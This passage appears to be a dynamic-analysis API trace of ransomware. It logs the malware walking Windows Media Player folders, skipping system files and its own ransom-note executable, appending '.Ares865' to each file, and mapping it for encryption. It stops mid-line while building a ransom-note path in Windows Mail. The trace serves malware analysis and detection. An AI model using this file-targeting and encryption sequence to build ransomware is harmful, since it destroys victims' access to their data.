(in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui.Ares865") returned 74 [0122.493] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmplayer.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmplayer.exe.mui.ares865"), dwFlags=0x1) returned 1 [0122.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmplayer.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.495] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3072) returned 1 [0122.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.496] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.496] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.496] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf00, lpName=0x0) returned 0x170 [0122.496] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf00) returned 0x190000 [0122.496] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.497] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.497] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.498] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.498] CloseHandle (hObject=0x170) returned 1 [0122.498] CloseHandle (hObject=0x118) returned 1 [0122.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.501] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMPMediaSharing.dll.mui", cAlternateFileName="")) returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="aoldtz.exe") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2=".") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="..") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="windows") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="bootmgr") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="temp") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="pagefile.sys") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="boot") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="ids.txt") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="ntuser.dat") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="perflogs") returned 1 [0122.501] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2="MSBuild") returned 1 [0122.502] lstrlenW (lpString="WMPMediaSharing.dll.mui") returned 23 [0122.502] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui") returned 66 [0122.502] lstrcpyW (in: lpString1=0x2cce464, lpString2="WMPMediaSharing.dll.mui" | out: lpString1="WMPMediaSharing.dll.mui") returned="WMPMediaSharing.dll.mui" [0122.502] lstrlenW (lpString="WMPMediaSharing.dll.mui") returned 23 [0122.502] lstrlenW (lpString="Ares865") returned 7 [0122.502] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0122.502] lstrlenW (lpString=".dll") returned 4 [0122.502] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2=".dll") returned 1 [0122.502] lstrlenW (lpString=".lnk") returned 4 [0122.502] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2=".lnk") returned 1 [0122.502] lstrlenW (lpString=".ini") returned 4 [0122.502] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2=".ini") returned 1 [0122.502] lstrlenW (lpString=".sys") returned 4 [0122.502] lstrcmpiW (lpString1="WMPMediaSharing.dll.mui", lpString2=".sys") returned 1 [0122.502] lstrlenW (lpString="WMPMediaSharing.dll.mui") returned 23 [0122.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.Ares865") returned 81 [0122.502] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpmediasharing.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpmediasharing.dll.mui.ares865"), dwFlags=0x1) returned 1 [0122.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpmediasharing.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.504] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0122.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.505] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.505] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.506] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.506] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x170 [0122.507] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x190000 [0122.509] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.510] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.510] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.510] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.511] CloseHandle (hObject=0x170) returned 1 [0122.511] CloseHandle (hObject=0x118) returned 1 [0122.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.511] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpnssci.dll.mui", cAlternateFileName="")) returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="aoldtz.exe") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2=".") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="..") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="windows") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="bootmgr") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="temp") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="pagefile.sys") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="boot") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="ids.txt") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="ntuser.dat") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="perflogs") returned 1 [0122.511] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2="MSBuild") returned 1 [0122.511] lstrlenW (lpString="wmpnssci.dll.mui") returned 16 [0122.511] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPMediaSharing.dll.mui") returned 73 [0122.511] lstrcpyW (in: lpString1=0x2cce464, lpString2="wmpnssci.dll.mui" | out: lpString1="wmpnssci.dll.mui") returned="wmpnssci.dll.mui" [0122.511] lstrlenW (lpString="wmpnssci.dll.mui") returned 16 [0122.511] lstrlenW (lpString="Ares865") returned 7 [0122.511] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0122.511] lstrlenW (lpString=".dll") returned 4 [0122.512] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2=".dll") returned 1 [0122.512] lstrlenW (lpString=".lnk") returned 4 [0122.512] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2=".lnk") returned 1 [0122.512] lstrlenW (lpString=".ini") returned 4 [0122.512] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2=".ini") returned 1 [0122.512] lstrlenW (lpString=".sys") returned 4 [0122.512] lstrcmpiW (lpString1="wmpnssci.dll.mui", lpString2=".sys") returned 1 [0122.512] lstrlenW (lpString="wmpnssci.dll.mui") returned 16 [0122.512] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui.Ares865") returned 74 [0122.512] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssci.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssci.dll.mui.ares865"), dwFlags=0x1) returned 1 [0122.514] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssci.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.514] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4096) returned 1 [0122.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.515] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.515] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.515] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.516] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1300, lpName=0x0) returned 0x170 [0122.530] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1300) returned 0x190000 [0122.534] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.535] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.535] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.536] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.536] CloseHandle (hObject=0x170) returned 1 [0122.536] CloseHandle (hObject=0x118) returned 1 [0122.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.536] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpnssui.dll.mui", cAlternateFileName="")) returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="aoldtz.exe") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2=".") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="..") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="windows") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="bootmgr") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="temp") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="pagefile.sys") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="boot") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="ids.txt") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="ntuser.dat") returned 1 [0122.536] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="perflogs") returned 1 [0122.537] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2="MSBuild") returned 1 [0122.537] lstrlenW (lpString="wmpnssui.dll.mui") returned 16 [0122.537] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssci.dll.mui") returned 66 [0122.537] lstrcpyW (in: lpString1=0x2cce464, lpString2="wmpnssui.dll.mui" | out: lpString1="wmpnssui.dll.mui") returned="wmpnssui.dll.mui" [0122.537] lstrlenW (lpString="wmpnssui.dll.mui") returned 16 [0122.537] lstrlenW (lpString="Ares865") returned 7 [0122.537] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0122.537] lstrlenW (lpString=".dll") returned 4 [0122.537] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2=".dll") returned 1 [0122.537] lstrlenW (lpString=".lnk") returned 4 [0122.537] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2=".lnk") returned 1 [0122.537] lstrlenW (lpString=".ini") returned 4 [0122.537] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2=".ini") returned 1 [0122.537] lstrlenW (lpString=".sys") returned 4 [0122.537] lstrcmpiW (lpString1="wmpnssui.dll.mui", lpString2=".sys") returned 1 [0122.537] lstrlenW (lpString="wmpnssui.dll.mui") returned 16 [0122.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui.Ares865") returned 74 [0122.538] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssui.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssui.dll.mui.ares865"), dwFlags=0x1) returned 1 [0122.540] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssui.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.540] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0122.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.540] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.541] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.541] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.541] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x170 [0122.543] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x190000 [0122.546] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.547] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.547] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.547] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.547] CloseHandle (hObject=0x170) returned 1 [0122.547] CloseHandle (hObject=0x118) returned 1 [0122.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.548] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpnssui.dll.mui", cAlternateFileName="")) returned 0 [0122.548] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.548] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0122.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Mail") returned="C:\\Program Files (x86)\\Windows Mail" [0122.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee9c0 | out: hHeap=0x2b0000) returned 1 [0122.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0122.548] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Mail") returned 35 [0122.548] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Mail" | out: lpString1="C:\\Program Files (x86)\\Windows Mail") returned="C:\\Program Files (x86)\\Windows Mail" [0122.548] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR 